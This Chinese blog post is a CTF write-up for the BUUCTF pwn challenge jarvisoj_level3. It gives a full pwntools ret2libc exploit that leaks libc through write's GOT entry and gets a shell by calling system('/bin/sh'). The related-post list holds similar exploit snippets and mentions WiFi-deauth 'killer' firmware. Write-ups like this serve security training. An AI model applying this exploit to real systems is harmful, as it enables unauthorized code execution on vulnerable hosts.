BUUCTF--pwn--jarvisoj_level3【ret2libc】

已于 2022-12-12 11:48:52 修改
阅读量282 收藏
点赞数 1
分类专栏: pwn刷题笔记 文章标签: python 开发语言
于 2022-12-04 23:11:35 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_73149934/article/details/128178243
版权

保护

b3e9833ee55c4440ab2286b6ef8b3aec.png

ida

cdeb9730f221427f98f2a4bd5d0c35c0.png

 e52d271ea7174b3e8aadbcd2c5bc785f.png

 没有system和/bin/sh,典型ret2libc

exp

from pwn import*
from LibcSearcher3 import*
context.log_level="debug"
elf=ELF("/home/error/桌面/level3")

#i=process("/home/error/桌面/level3")
i=remote("node4.buuoj.cn",27813)
print("+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++")
write_plt=elf.plt["write"]
write_got=elf.got["write"]
main=elf.symbols["main"]

p1=cyclic(0x88+4)+flat([write_plt,main,1,write_got,4])#注意write的三个参数

i.sendlineafter("Input:\n",p1)
write_addr=u32(i.recv(4))
print(hex(write_addr))
print("++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++")
libc=LibcSearcher("write",write_addr)
libc_base=write_addr-libc.dump("write")
sys_addr=libc_base+libc.dump("system")
sh_addr=libc_base+libc.dump("str_bin_sh")

p2=cyclic(0x88+4)+flat([sys_addr,0,sh_addr])

i.sendlineafter("Input:\n",p2)

i.interactive()

不知道为什么用libcsearcher远端和本地的libc版本不一样,本地打得通远端打不通,用了个libcsearcher3才打通远端

X1NRI
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
[BUUCTF]PWN——jarvisoj_level3
mcmuyanga的博客
10-28 757
jarvisoj_level3 附件 步骤 例行检查,32位,nx保护 运行一下程序 32位ida载入,shift+f12没有看到程序里有可以直接利用的后面函数,根据运行时的字符串找到了程序的关键函数 参数buf明显的溢出漏洞,使用ret2libc的办法去获取shell 利用过程: 0x1 利用wire函数泄露libc版本 write_plt=elf.plt['write'] write_got=elf.got['write'] payload='a'*(0x88+4)+p32(write_p
buuctf jarvisoj_level3(libc
carol2358的博客
05-01 351
常规32位泄漏libc exp: from pwn import * from LibcSearcher import * local_file = './level3' local_libc = '/lib/x86_64-linux-gnu/libc-2.23.so' remote_libc = './libc.so.6' select = 1 if select == 0: ...
BUUCTFjarvisoj_level3
m0_51251108的博客
12-28 339
BUUCTFjarvisoj_level3 标准的ret2libc 这里记一下找偏移的方法: readelf -a libc库文件|grep “puts” 或者用symbol这些 strings 文件 -tx|grep “/bin/sh” 抓出/bin/sh 可以找/bin/sh在libc中的地址 这里直接给出exp: from pwn import* r=remote('node3.buuoj.cn',28705) libc=ELF('./libc-2.23.so') elf=ELF('./
BUUCTF(pwn)jarvisoj_level3
半岛铁盒的博客
04-02 274
EXP from pwn import* from LibcSearcher import* r=remote('node3.buuoj.cn',25564) main=0x8048484 elf=ELF('./2') write_plt=elf.plt['write'] write_got=elf.got['write'] payload='a'*(0x88+4)+p32(write_plt)+p32(main)+p32(1)+p32(write_got)+p32(4) r.sendl..
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
pwn题目中的libc-2.27.so文件
04-11
pwn题,有些时候题目不给这个文件,这里是这个库的文件。
libc-database:建立libc偏移量数据库以简化开发
04-01
libc数据库现在具有Web服务和前端。 访问尝试一下! 如果您对API感兴趣,请阅读 。 建立一个libc偏移量数据库 如果您遇到错误,请检查下面的“要求”部分。 获取所需的libc类别并提取符号偏移量。 它不会下载任何...
jarvisoj_typo
05-14
jarvisoj_typo,arm架构下的pwn题。
[BUUCTF]PWN——jarvisoj_level3_x64
BangSen1的博客
03-17 227
jarvisoj_level3_x64 例行检查,64位,开启NX保护。 运行一下。 IDA打开,查看main函数 function()函数 buf溢出漏洞,read之前已经调用过write函数,利用它来泄露libc版本 64位程序在传参的时候要先用到rdi,rsi,rdx,rcx,r8,r9这几个寄存器,都满了之后才会在栈上传参 利用ROPgadget找一下设置寄存器的指令 rdi=0x4006b3 rsi_r15=0x4006b1 payload='a'*(0x80+8)+p64(rdi)+
[BUUCTF]PWN——cmcc_pwnme1(ret2libc)
mcmuyanga的博客
01-30 661
cmcc_pwnme1 附件 步骤 例行检查,32位程序,没用开启任何保护 本地试运行一下,看看大概的情况 32位ida载入,检索字符串的时候发现了读出flag的函数 这个flag的位置不清楚对不对,按照buu的习性,应该不对 main() getfruit(),这边存在栈溢出 先试一下那个读出flag的函数,和我想的一样,buu上flag的目录不在那儿 因为看到没用开启nx,所以一开始想要使用shellcode,但是碍于没法获得参数v1在栈上的位置,就换用ret2libc的方法了 完整ex
BUUCTF ciscn_2019_c_1(ret2libc
weixin_45441024的博客
01-04 370
BUUCTF ciscn_2019_c_1(ret2libc) 首先还是check一下,之后放到IDA里面进行分析 可以看到里面有一个encrypt函数,我们来对他进行一个分析,可以看到一个关键点 做法一: 我们可以得出只要输入东西了,这个IF判断就是成立的,所以我们这里需要了解一个知识:在输入的内容前面加入’\0’可以绕过strlen这个函数 在这个函数里我们也可以很快找到溢出的地方,gets函数,对于我们输入的内容长度没有限制,再看上面定义变量的时候,s距离栈底的长度为0x50,纵观函数内容我们
BUUCTF--pwn--ciscn_2019_c_1【ret2libc_64】
qq_73149934的博客
12-06 255
BUUCTF--pwn--ciscn_2019_c_1
[buuctf][WUSTCTF2020]level3
逆向萌新的博客
07-13 963
[buuctf][WUSTCTF2020]level3
BUUCTF jarvisoj exp整合
菜的只能随便写写博客
02-24 564
0x01 jarvisoj_level0  简单的地址改写 from pwn import * p = remote('node3.buuoj.cn', 26882) #p = process('./level0') shell_addr = 0x0000000000400596 p.sendline('a'*0x88+p64(shell_addr)) p.interactive()  ...
[BUUCTF-pwn]——jarvisoj_level3_x64
Y_peak的博客
02-22 215
[BUUCTF-pwn]——jarvisoj_level3_x64 题目地址:https://buuoj.cn/challenges#jarvisoj_level3_x64 点击查看 write up 博主有点懒,不想写第二遍。 ????
jarvisoj level3
sun的博客
10-03 1008
level3 将文件下载下来使用linux下的checksec进行检查开启了什么安全机制 sun@ubuntu:~/Desktop/test$ checksec level3 [*] '/home/sun/Desktop/test/level3' Arch: i386-32-little RELRO: Partial RELRO Stack: No c...
Jarvis OJ_level3_入门栈溢出
Jc
07-11 318
附录:发现这个网站的题还是挺系统的,对于入门pwn的是挺好的一个选择 解题思路 1. 查看文件信息,安全机制 2. 代码审计 3. 分析漏洞点 4. 编写EXP
jarvisoj_level1
最新发布
08-28
很抱歉,我无法回答这个问题。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *3* [[BUUCTF-pwn]——jarvisoj_level1](https://blog.csdn.net/Y_peak/article/details/114916604)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] - *2* [个人网站大总结合集—持续更新,欢迎共享,不要白嫖哦](https://download.csdn.net/download/weixin_38708461/14885161)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值